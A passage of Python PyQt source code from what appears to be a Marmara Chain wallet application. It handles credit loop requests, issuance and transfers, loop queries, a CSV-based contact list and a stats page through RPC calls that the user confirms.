selected_contactpubkey_transfer[2] == 'Pubkey':\n self.looprequest_otherpk_lineEdit.clear()\n\n @pyqtSlot()\n def search_marmarareceivelist(self):\n pubkey = self.current_pubkey_value.text()\n if self.looprequest_otherpk_radioButton.isChecked():\n pubkey = self.looprequest_otherpk_lineEdit.text()\n if self.request_date_checkBox.checkState():\n maxage = '1440'\n else:\n date = self.request_dateTimeEdit.dateTime()\n maxage = self.change_datetime_to_block_age(date)\n logging.info('maxage ' + str(maxage))\n self.bottom_info(self.tr('searching incoming loop requests'))\n logging.info('querying incoming loop requests with marmarareceivelist')\n self.worker_marmarareceivelist = marmarachain_rpc.RpcHandler()\n method = cp.marmarareceivelist\n params = [pubkey, str(maxage)]\n self.worker_thread(self.thread_marmarareceivelist, self.worker_marmarareceivelist, method, params,\n self.search_marmarareceivelist_result)\n\n @pyqtSlot(tuple)\n def search_marmarareceivelist_result(self, result_out):\n if result_out[2] == 200 or result_out[2] == 0:\n self.bottom_info(self.tr('finished searching incoming loop requests'))\n logging.info('finished querying incoming loop requests')\n result = json.loads(str(result_out[0]))\n if type(result) == list:\n self.loop_request_tableWidget.setRowCount(len(result))\n loop_create_request_list = []\n loop_transfer_request_list = []\n for item in result:\n tx_id = item.get('txid')\n func_id = item.get('funcid')\n amount = item.get('amount')\n matures = item.get('matures')\n maturity = self.change_block_to_date(matures)\n receive_pk = item.get('receivepk')\n receive_pubkey = self.check_pubkey_contact_name(receive_pk)\n # issuer_pk = item.get('issuerpk')\n if func_id == 'B':\n row = [tx_id, amount, maturity, receive_pubkey, receive_pk]\n loop_create_request_list.append(row)\n if func_id == 'R':\n row = [tx_id, amount, maturity, receive_pubkey, receive_pk]\n loop_transfer_request_list.append(row)\n self.set_credit_request_table(loop_create_request_list)\n self.set_transfer_request_table(loop_transfer_request_list)\n if type(result) == dict:\n if result.get('result') == 'error':\n self.bottom_err_info(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def set_credit_request_table(self, credit_request_list):\n self.loop_request_tableWidget.setRowCount(len(credit_request_list))\n self.loop_request_tableWidget.setColumnHidden(5, True)\n self.loop_request_tableWidget.setSortingEnabled(False)\n for row in credit_request_list:\n row_number = credit_request_list.index(row)\n btn_review = QPushButton(qta.icon('mdi.text-box-check-outline', color='#728FCE'), '')\n btn_review.setIconSize(QSize(24, 24))\n self.loop_request_tableWidget.setCellWidget(row_number, 0, btn_review)\n self.loop_request_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(row[0])))\n self.loop_request_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(row[1])))\n self.loop_request_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(row[2])))\n self.loop_request_tableWidget.setItem(row_number, 4, QTableWidgetItem(str(row[3])))\n self.loop_request_tableWidget.setItem(row_number, 5, QTableWidgetItem(str(row[4])))\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n self.loop_request_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n btn_review.clicked.connect(self.review_creditloop_request)\n self.loop_request_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot()\n def review_creditloop_request(self):\n button = self.sender()\n index = self.loop_request_tableWidget.indexAt(button.pos())\n if index.isValid():\n tx_id = self.loop_request_tableWidget.item(index.row(), 1).text()\n receiver_pk = self.loop_request_tableWidget.item(index.row(), 5).text()\n self.marmaraissue(receiver_pk, tx_id)\n\n def set_transfer_request_table(self, transfer_request_list):\n self.transferrequests_tableWidget.setRowCount(len(transfer_request_list))\n self.transferrequests_tableWidget.setColumnHidden(5, True)\n self.transferrequests_tableWidget.setSortingEnabled(False)\n for row in transfer_request_list:\n row_number = transfer_request_list.index(row)\n btn_review = QPushButton(qta.icon('mdi.text-box-check-outline', color='#728FCE'), '')\n btn_review.setIconSize(QSize(24, 24))\n self.transferrequests_tableWidget.setCellWidget(row_number, 0, btn_review)\n self.transferrequests_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(row[0])))\n self.transferrequests_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(row[1])))\n self.transferrequests_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(row[2])))\n self.transferrequests_tableWidget.setItem(row_number, 4, QTableWidgetItem(str(row[3])))\n self.transferrequests_tableWidget.setItem(row_number, 5, QTableWidgetItem(str(row[4])))\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n self.transferrequests_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n btn_review.clicked.connect(self.review_credittransfer_request)\n self.transferrequests_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot()\n def review_credittransfer_request(self):\n button = self.sender()\n index = self.transferrequests_tableWidget.indexAt(button.pos())\n if index.isValid():\n tx_id = self.transferrequests_tableWidget.item(index.row(), 1).text()\n receiver_pk = self.transferrequests_tableWidget.item(index.row(), 5).text()\n self.marmaratransfer(receiver_pk, tx_id)\n\n def marmaraissue(self, receiver_pk, txid):\n method = cp.marmaraissue\n params = [receiver_pk, {'avalcount': '0', 'autosettlement': 'true', 'autoinsurance': 'true',\n 'disputeexpires': 'offset', 'EscrowOn': 'false', 'BlockageAmount': '0'}, txid]\n self.worker_marmaraissue = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_marmaraissue, self.worker_marmaraissue, method, params, self.marmaraissue_result)\n\n @pyqtSlot(tuple)\n def marmaraissue_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n message_box = self.custom_message(self.tr('Create Credit Loop'),\n self.tr(\n \"You are about to create credit loop with given details below:\") +\n \"
    Tx ID = \" + result.get('requesttxid') +\n \"
    Pubkey = \" + result.get('receiverpk'), \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def marmaratransfer(self, receiver_pk, tx_id):\n method = cp.marmaratransfer\n params = [receiver_pk, {'avalcount': '0'}, tx_id]\n self.worker_marmaratransfer = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_marmaratransfer, self.worker_marmaratransfer, method, params,\n self.marmaratransfer_result)\n\n @pyqtSlot(tuple)\n def marmaratransfer_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n message_box = self.custom_message(self.tr('Transfer Credit Loop'),\n self.tr(\"You are about to transfer you credit loop with given \"\n \"details below:\") +\n \"
    baton txid = \" + result.get('batontxid') +\n \"
    Pubkey = \" + result.get('receiverpk'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --- Create Loop Request page functions ----\n\n @pyqtSlot()\n def marmarareceive(self):\n amount = self.make_credit_loop_amount_lineEdit.text()\n senderpk = self.make_credit_loop_senderpubkey_lineEdit.text()\n matures_date = self.make_credit_loop_matures_dateTimeEdit.dateTime()\n matures = self.change_datetime_to_block_age(matures_date)\n if amount and senderpk and matures:\n self.worker_marmarareceive = marmarachain_rpc.RpcHandler()\n method = cp.marmarareceive\n currency = self.make_credit_loop_currency_value_label.text()\n params = [senderpk, amount, currency, str(matures), {'avalcount': '0'}]\n self.bottom_info(self.tr('preparing loop request'))\n self.worker_thread(self.thread_marmarareceive, self.worker_marmarareceive, method, params,\n self.marmarareceive_result)\n else:\n self.bottom_info(self.tr('cannot make a credit loop request with empty fields'))\n logging.warning('cannot make a credit loop request with empty fields')\n\n @pyqtSlot(tuple)\n def marmarareceive_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n logging.info(result)\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to make a credit loop request'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info('Transaction aborted')\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # function name: marmararecieve_transfer\n # purpose: holder makes a marmarareceive request to the endorser to get the credit for selling the goods/services\n @pyqtSlot()\n def marmararecieve_transfer(self):\n senderpk = self.transfer_senderpubkey_lineEdit.text()\n baton = self.transfer_baton_lineEdit.text()\n if senderpk and baton:\n self.worker_marmarareceive_transfer = marmarachain_rpc.RpcHandler()\n method = cp.marmarareceive\n params = [senderpk, baton, {'avalcount': '0'}]\n self.worker_thread(self.thread_marmarareceive_transfer, self.worker_marmarareceive_transfer,\n method, params, self.marmararecieve_transfer_result)\n else:\n self.bottom_info(self.tr('cannot make a receive transfer request with empty fields'))\n logging.warning('cannot make a receive transfer request with empty fields')\n\n @pyqtSlot(tuple)\n def marmararecieve_transfer_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n logging.info(result)\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to make a request to the endorser'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # -------------------------------------------------------------------\n # Total Credit Loops page functions\n # --------------------------------------------------------------------\n @pyqtSlot()\n def search_active_loops(self):\n pubkey = self.current_pubkey_value.text()\n if pubkey:\n self.bottom_info(self.tr('getting active Loops details'))\n logging.info('getting active Loops details')\n self.worker_getloops = marmarachain_rpc.RpcHandler()\n method = cp.marmarainfo\n params = ['0', '0', '0', '0', pubkey]\n self.worker_thread(self.thread_getloops, self.worker_getloops, method, params, self.loops_details_result,\n execute='active_loops_details')\n else:\n self.bottom_info('pubkey not set!')\n self.clear_search_active_loops_labels()\n\n @pyqtSlot(tuple)\n def loops_details_result(self, result_out):\n if result_out[2] == 0:\n self.set_activeloops_table(result_out[0])\n self.set_loop_amount_result(result_out[1])\n self.refresh_loopinfo_button.setVisible(True)\n if result_out[2] == 1:\n self.bottom_err_info(result_out[1])\n logging.error(str(result_out[1]))\n\n def set_loop_amount_result(self, result):\n self.myCCActivatedAddress = str(result.get('myCCActivatedAddress'))\n self.normal_amount_value.setText(str(result.get('myPubkeyNormalAmount')))\n self.wallet_total_normal_value.setText(str(result.get('myWalletNormalAmount')))\n self.activated_amount_value.setText(str(result.get('myActivatedAmount')))\n self.activeloops_total_amount_value_label.setText(str(result.get('TotalLockedInLoop')))\n self.total_issuer_loop_amount_label_value.setText(str(result.get('totalamount')))\n self.closedloops_total_amount_value_label.setText(str(result.get('totalclosed')))\n self.activeloops_pending_number_value_label.setText(str(result.get('numpending')))\n self.closedloops_total_number_value_label.setText(str(result.get('numclosed')))\n self.numberof_total_activeloops_label_value.setText(str(len(result.get('Loops'))))\n my_total_normal = float(self.wallet_total_normal_value.text())\n my_total_activated = float(self.activated_amount_value.text())\n my_total_inloops = float(self.activeloops_total_amount_value_label.text())\n self.stats_amount_in_activated_lineEdit.setText(self.totalactivated_value_label.text())\n self.stats_amount_in_loops_lineEdit.setText(self.activeloops_total_amount_value_label.text())\n my_total = my_total_normal + my_total_activated + my_total_inloops\n self.my_stats_normal_label_value.setText(str(round((my_total_normal / my_total) * 100, 2)))\n self.my_stats_activated_label_value.setText(str(round((my_total_activated / my_total) * 100, 2)))\n self.my_stats_inloops_label_value.setText(str(round((my_total_inloops / my_total) * 100, 2)))\n\n @pyqtSlot(tuple)\n def marmarinfo_amount_and_loops_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n # self.wallet_total_activated_value.setText(str(result.get('myTotalAmountOnActivatedAddress')))\n self.bottom_info(self.tr('getting address amounts finished'))\n self.set_loop_amount_result(result)\n self.bottom_info(self.tr('finished searching marmara blockchain for all blocks for the set pubkey'))\n logging.info('finished searching marmara blockchain for all blocks for the set pubkey')\n self.refresh_loopinfo_button.setVisible(True)\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n self.clear_search_active_loops_labels()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def set_activeloops_table(self, loop_info):\n self.activeloops_tableWidget.setColumnHidden(5, True)\n self.activeloops_tableWidget.setRowCount(len(loop_info))\n self.activeloops_tableWidget.setSortingEnabled(False)\n for section in loop_info:\n row_number = loop_info.index(section)\n for item in section:\n column_no = section.index(item)\n if column_no == 2:\n item = self.check_pubkey_contact_name(item)\n if column_no == 3 or column_no == 4:\n item = self.change_block_to_date(item)\n self.activeloops_tableWidget.setItem(row_number, column_no, QTableWidgetItem(str(item)))\n self.activeloops_tableWidget.horizontalHeader().setSectionResizeMode(column_no,\n QHeaderView.ResizeToContents)\n self.activeloops_tableWidget.setSortingEnabled(True)\n\n def clear_search_active_loops_labels(self):\n self.total_issuer_loop_amount_label_value.clear()\n self.closedloops_total_amount_value_label.clear()\n self.activeloops_pending_number_value_label.clear()\n self.closedloops_total_number_value_label.clear()\n\n def clear_search_holder_loops_labels(self):\n self.total_transferrable_loop_amount_label_value.clear()\n self.numberof_transferrable_loop_amount_label_value.clear()\n self.holderloops_closed_amount_label_value.clear()\n self.holderloops_closed_number_label_value.clear()\n\n @pyqtSlot()\n def marmaraholderloops(self):\n pubkey = self.current_pubkey_value.text()\n if pubkey:\n self.bottom_info(self.tr('getting transferable Loops details'))\n logging.info('getting transferable Loops details')\n self.worker_holderloops = marmarachain_rpc.RpcHandler()\n method = cp.marmaraholderloops\n params = ['0', '0', '0', '0', pubkey]\n self.worker_thread(self.thread_marmarholderloop, self.worker_holderloops, method, params,\n worker_output=self.marmaraholderloops_result, execute='holder_loop_detail')\n else:\n self.bottom_info('pubkey not set!')\n self.clear_search_holder_loops_labels()\n\n @pyqtSlot(tuple)\n def marmaraholderloops_result(self, result_out):\n if result_out[2] == 0:\n self.set_holder_loops_table(result_out[0])\n self.total_transferrable_loop_amount_label_value.setText(str(result_out[1].get('totalamount')))\n self.numberof_transferrable_loop_amount_label_value.setText(str(result_out[1].get('numpending')))\n self.holderloops_closed_amount_label_value.setText(str(result_out[1].get('totalclosed')))\n self.holderloops_closed_number_label_value.setText(str(result_out[1].get('numclosed')))\n if result_out[2] == 1:\n self.bottom_err_info(result_out[1])\n logging.error(str(result_out[1]))\n\n def set_holder_loops_table(self, loop_info):\n self.transferableloops_tableWidget.setColumnHidden(5, True)\n self.transferableloops_tableWidget.setRowCount(len(loop_info))\n self.transferableloops_tableWidget.setSortingEnabled(False)\n for section in loop_info:\n row_number = loop_info.index(section)\n for item in section:\n column_no = section.index(item)\n if column_no == 2:\n item = self.check_pubkey_contact_name(item)\n if column_no == 3 or column_no == 4:\n item = self.change_block_to_date(item)\n self.transferableloops_tableWidget.setItem(row_number, column_no, QTableWidgetItem(str(item)))\n self.transferableloops_tableWidget.horizontalHeader().setSectionResizeMode(column_no,\n QHeaderView.ResizeToContents)\n self.transferableloops_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot(int, int)\n def activeloop_itemcontext(self, row, column):\n item = self.activeloops_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n @pyqtSlot(int, int)\n def transferableloops_itemcontext(self, row, column):\n item = self.transferableloops_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n # -------------------------------------------------------------------\n # Credit Loop Queries functions\n # --------------------------------------------------------------------\n\n @pyqtSlot()\n def search_any_pubkey_loops(self):\n pubkey = self.loopqueries_pubkey_lineEdit.text()\n if pubkey:\n self.marmarainfo(pubkey, self.get_search_any_pubkey_loops_result)\n else:\n self.bottom_info('write pubkey to search!')\n logging.info('write pubkey to search!')\n self.clear_lq_txid_search_result()\n\n def get_search_any_pubkey_loops_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n self.lq_pubkey_address_label_value.setText(str(result.get('myNormalAddress')))\n self.lq_pubkeynormalamount_value_label.setText(str(result.get('myPubkeyNormalAmount')))\n self.lq_pubkeyactivatedamount_value_label.setText(str(result.get('myActivatedAmount')))\n self.lq_activeloopno_value_label.setText(str(result.get('numpending')))\n self.lq_pubkeyloopamount_value_label.setText(str(result.get('TotalLockedInLoop')))\n self.lq_closedloopno_value_label.setText(str(result.get('numclosed')))\n self.lq_pubkeyclosedloopamount_value_label.setText(str(result.get('totalclosed')))\n self.bottom_info(self.tr('finished searching marmarainfo'))\n logging.info('finished searching marmarainfo')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n self.clear_lq_pubkey_result()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def clear_lq_pubkey_result(self):\n self.lq_pubkeynormalamount_value_label.clear()\n self.lq_pubkeyactivatedamount_value_label.clear()\n self.lq_activeloopno_value_label.clear()\n self.lq_pubkeyloopamount_value_label.clear()\n self.lq_closedloopno_value_label.clear()\n self.lq_pubkeyclosedloopamount_value_label.clear()\n\n def marmaracreditloop(self, txid):\n self.bottom_info(self.tr('getting credit loop info, please wait'))\n logging.info('getting credit loop info, please wait')\n self.worker_marmaracreditloop = marmarachain_rpc.RpcHandler()\n method = cp.marmaracreditloop\n params = [txid]\n marmaracreditloop_thread = self.worker_thread(self.thread_marmaracreditloop, self.worker_marmaracreditloop,\n method, params)\n return marmaracreditloop_thread\n\n @pyqtSlot()\n def search_loop_txid(self):\n txid = self.loopsearch_txid_lineEdit.text()\n if txid:\n marmaracreditloop = self.marmaracreditloop(txid)\n if self.chain_status:\n marmaracreditloop.command_out.connect(self.search_loop_txid_result)\n else:\n self.bottom_info(self.tr('write loop transaction id to search!'))\n logging.info('write loop transaction id to search!')\n self.clear_lq_txid_search_result()\n\n @pyqtSlot(tuple)\n def search_loop_txid_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n logging.info(result)\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n self.clear_lq_txid_search_result()\n else:\n creditloop = result.get('creditloop')\n if str(result.get('funcid')) == 'S':\n baton = str(result.get('settlement'))\n batonpk = str(result.get('pubkey'))\n amount = str(result.get('collected'))\n self.loopquery_baton_label.setText(self.tr('Txid (Settlement)'))\n issuerpk = str((creditloop[0]).get('issuerpk'))\n elif str(result.get('funcid')) == 'B':\n issuerpk = str(result.get('issuerpk'))\n amount = str(result.get('amount'))\n baton = str(result.get('createtxid'))\n batonpk = str(self.tr('Not issued yet!'))\n self.loopquery_baton_label.setText(self.tr('Txid (baton)'))\n else:\n baton = str(result.get('batontxid'))\n batonpk = str(result.get('batonpk'))\n amount = str(result.get('amount'))\n issuerpk = str((creditloop[0]).get('issuerpk'))\n self.loopquery_baton_label.setText(self.tr('Txid (baton)'))\n\n self.loopquery_baton_value.setText(baton)\n self.loopquery_amount_value.setText(amount)\n self.loopquery_currency_value.setText(result.get('currency'))\n self.loopquery_matures_value.setText(str(result.get('matures')))\n self.loopquery_batonpk_value.setText(batonpk)\n self.loopquery_issuer_value.setText(issuerpk)\n self.loopquery_transfercount_value.setText(str(result.get('n')))\n self.bottom_info(self.tr('credit loop info finished'))\n logging.info('credit loop info finished')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def clear_lq_txid_search_result(self):\n self.loopquery_baton_value.clear()\n self.loopquery_amount_value.clear()\n self.loopquery_batonpk_value.clear()\n self.loopquery_currency_value.clear()\n self.loopquery_matures_value.clear()\n self.loopquery_issuer_value.clear()\n\n # -------------------------------------------------------------------\n # Getting Contacts into comboboxes\n # --------------------------------------------------------------------\n def get_contact_names_addresses(self):\n self.contacts_address_comboBox.clear()\n self.receiver_address_lineEdit.clear()\n self.contacts_address_comboBox.addItem(self.tr('Contacts'))\n contacts_data = configuration.ContactsSettings().read_csv_file()\n for name in contacts_data:\n if name[0] != 'Name':\n self.contacts_address_comboBox.addItem(name[0])\n\n @pyqtSlot()\n def get_selected_contact_address(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contact_address = contacts_data[self.contacts_address_comboBox.currentIndex()]\n if selected_contact_address[1] != 'Address':\n self.receiver_address_lineEdit.setText(selected_contact_address[1])\n if selected_contact_address[1] == 'Address':\n self.receiver_address_lineEdit.clear()\n\n def get_contact_names_pubkeys(self):\n self.contactpk_makeloop_comboBox.clear()\n self.contactpk_transferrequest_comboBox.clear()\n self.contactpk_otherpk_looprequest_comboBox.clear()\n self.make_credit_loop_senderpubkey_lineEdit.clear()\n self.transfer_senderpubkey_lineEdit.clear()\n self.contactpk_makeloop_comboBox.addItem(self.tr('Contacts'))\n self.contactpk_transferrequest_comboBox.addItem(self.tr('Contacts'))\n self.contactpk_otherpk_looprequest_comboBox.addItem(self.tr('Contacts'))\n contacts_data = configuration.ContactsSettings().read_csv_file()\n for name in contacts_data:\n if name[0] != 'Name':\n self.contactpk_makeloop_comboBox.addItem(name[0])\n self.contactpk_transferrequest_comboBox.addItem(name[0])\n self.contactpk_otherpk_looprequest_comboBox.addItem(name[0])\n\n @pyqtSlot()\n def get_selected_contact_loop_pubkey(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contactpubkey_loop = contacts_data[self.contactpk_makeloop_comboBox.currentIndex()]\n if selected_contactpubkey_loop[2] != 'Pubkey':\n self.make_credit_loop_senderpubkey_lineEdit.setText(selected_contactpubkey_loop[2])\n if selected_contactpubkey_loop[2] == 'Pubkey':\n self.make_credit_loop_senderpubkey_lineEdit.clear()\n\n @pyqtSlot()\n def get_selected_contact_transfer_pubkey(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contactpubkey_transfer = contacts_data[self.contactpk_transferrequest_comboBox.currentIndex()]\n if selected_contactpubkey_transfer[2] != 'Pubkey':\n self.transfer_senderpubkey_lineEdit.setText(selected_contactpubkey_transfer[2])\n if selected_contactpubkey_transfer[2] == 'Pubkey':\n self.transfer_senderpubkey_lineEdit.clear()\n\n # -------------------------------------------------------------------\n # Adding contacts editing and deleting\n # --------------------------------------------------------------------\n @pyqtSlot()\n def add_contact(self):\n contact_name = self.contactname_lineEdit.text()\n contact_address = self.contactaddress_lineEdit.text().replace(' ', '')\n contact_pubkey = self.contactpubkey_lineEdit.text().replace(' ', '')\n contact_group = self.contactgroup_lineEdit.text().replace(' ', '')\n new_record = [contact_name, contact_address, contact_pubkey, contact_group]\n unique_record = self.unique_contacts(contact_name, contact_address, contact_pubkey)\n if unique_record:\n response = self.custom_message(self.tr(\"Error Adding Contact\"),\n unique_record.get('error'),\n \"information\",\n QMessageBox.Warning)\n if not unique_record:\n configuration.ContactsSettings().add_csv_file(new_record)\n read_contacts_data = configuration.ContactsSettings().read_csv_file()\n self.update_contact_tablewidget(read_contacts_data)\n self.clear_contacts_line_edit()\n response = self.custom_message(self.tr('Added Contact'),\n self.tr('It is your responsibility that the information you have entered '\n 'are correct and valid.'),\n \"information\",\n QMessageBox.Information)\n\n def unique_contacts(self, name, address, pubkey, contacts_data=None):\n if contacts_data:\n pass\n elif not contacts_data:\n contacts_data = configuration.ContactsSettings().read_csv_file()\n if name == address:\n return {'error': self.tr('Name and Address cannot be the same!')}\n if name == pubkey:\n return {'error': self.tr('Name and Pubkey cannot be the same!')}\n if pubkey == address:\n return {'error': self.tr('Pubkey and Address cannot be the same!')}\n for row in contacts_data:\n if row[0] == name:\n logging.error('same contact name exists')\n return {'error': self.tr('Same name exists')}\n if row[1] == address:\n logging.error('same address exists')\n return {'error': self.tr('Same address exists')}\n if row[2] == pubkey:\n logging.error('same pubkey exists')\n return {'error': self.tr('Same pubkey exists')}\n if not name or not address or not pubkey:\n logging.error('empty record')\n return {'error': self.tr('cannot be an empty record')}\n # is_valid_address = row[1] # check if address is valid\n # if is_valid_address == False:\n # return {'error': self.tr('address is not valid')}\n # is_valid_pubkey = row[2] # check if pubkey is valid\n # if is_valid_pubkey == False:\n # return {'error': self.tr('pubkey is not valid')}\n\n @pyqtSlot()\n def clear_contacts_line_edit(self):\n self.contactname_lineEdit.clear()\n self.contactaddress_lineEdit.clear()\n self.contactpubkey_lineEdit.clear()\n self.contactgroup_lineEdit.clear()\n self.contact_editing_row = None\n\n def update_contact_tablewidget(self, contacts_data=None):\n self.contacts_tableWidget.setSortingEnabled(False)\n if contacts_data:\n pass\n elif not contacts_data:\n contacts_data = configuration.ContactsSettings().read_csv_file()\n self.contacts_tableWidget.setRowCount(len(contacts_data) - 1) # -1 for exclude header\n del contacts_data[0]\n # self.contacts_tableWidget.autoScrollMargin()\n for row in contacts_data:\n row_number = contacts_data.index(row) # -1 for exclude header\n if len(row) < 4:\n row.append('')\n for item in row:\n self.contacts_tableWidget.setItem(row_number, row.index(item), QTableWidgetItem(str(item)))\n self.contacts_tableWidget.horizontalHeader().setSectionResizeMode(row.index(item),\n QHeaderView.ResizeToContents)\n self.contacts_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot(int, int)\n def get_contact_info(self, row, column):\n contact_name = \"\"\n contact_address = \"\"\n contact_pubkey = \"\"\n contact_group = \"\"\n if self.contacts_tableWidget.item(row, 0):\n contact_name = self.contacts_tableWidget.item(row, 0).text()\n if self.contacts_tableWidget.item(row, 1):\n contact_address = self.contacts_tableWidget.item(row, 1).text()\n if self.contacts_tableWidget.item(row, 2):\n contact_pubkey = self.contacts_tableWidget.item(row, 2).text()\n if self.contacts_tableWidget.item(row, 3):\n contact_group = self.contacts_tableWidget.item(row, 3).text()\n self.contactname_lineEdit.setText(contact_name)\n self.contactaddress_lineEdit.setText(contact_address)\n self.contactpubkey_lineEdit.setText(contact_pubkey)\n self.contactgroup_lineEdit.setText(contact_group)\n self.contact_editing_row = row\n\n @pyqtSlot()\n def update_contact(self):\n self.contacts_tableWidget.setSortingEnabled(False)\n if self.contact_editing_row is not None:\n read_contacts_data = configuration.ContactsSettings().read_csv_file()\n contact_name = self.contactname_lineEdit.text()\n contact_address = self.contactaddress_lineEdit.text().replace(' ', '')\n contact_pubkey = self.contactpubkey_lineEdit.text().replace(' ', '')\n contact_group = self.contactgroup_lineEdit.text().replace(' ', '')\n contact_data = configuration.ContactsSettings().read_csv_file()\n item_name = self.contacts_tableWidget.item(self.contact_editing_row, 0).text()\n for row in contact_data:\n if row[0] == item_name:\n self.contact_editing_row = contact_data.index(row)\n del contact_data[self.contact_editing_row] # removing editing record to don't check same record\n unique_record = self.unique_contacts(contact_name, contact_address, contact_pubkey, contact_data)\n if unique_record:\n self.bottom_info(unique_record.get('error'))\n logging.error(unique_record.get('error'))\n if not unique_record:\n read_contacts_data[self.contact_editing_row] = [contact_name, contact_address, contact_pubkey,\n contact_group]\n configuration.ContactsSettings().update_csv_file(read_contacts_data)\n self.update_contact_tablewidget()\n self.clear_contacts_line_edit()\n else:\n message_box = self.custom_message(self.tr('Error Updating Contact'),\n self.tr('You did not select a contact from table.'),\n \"information\",\n QMessageBox.Information)\n self.contacts_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot()\n def delete_contact(self):\n if self.contact_editing_row is not None:\n message_box = self.custom_message(self.tr('Deleting Contact'),\n self.tr('Are you sure to delete the contact from the list?'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n read_contacts_data = configuration.ContactsSettings().read_csv_file()\n del read_contacts_data[self.contact_editing_row + 1] # +1 for exclude header\n configuration.ContactsSettings().update_csv_file(read_contacts_data)\n self.update_contact_tablewidget()\n self.clear_contacts_line_edit()\n else:\n self.clear_contacts_line_edit()\n else:\n message_box = self.custom_message(self.tr('Error Deleting Contact'),\n self.tr('You did not select a contact from table.'),\n \"information\",\n QMessageBox.Information)\n\n # ------------------------\n # Stats Page\n # ------------------------\n\n @pyqtSlot()\n def get_marmara_stats(self):\n self.bottom_info(self.tr('getting stats values'))\n self.worker_mcl_stats = marmarachain_rpc.ApiWorker()\n self.worker_mcl_stats.moveToThread(self.thread_api_stats_request)\n self.worker_mcl_stats.finished.connect(self.thread_api_stats_request.quit)\n self.thread_api_stats_request.started.connect(self.worker_mcl_stats.mcl_stats_api)\n self.thread_api_stats_request.start()\n self.worker_mcl_stats.out_dict.connect(self.set_marmara_stats_values)\n 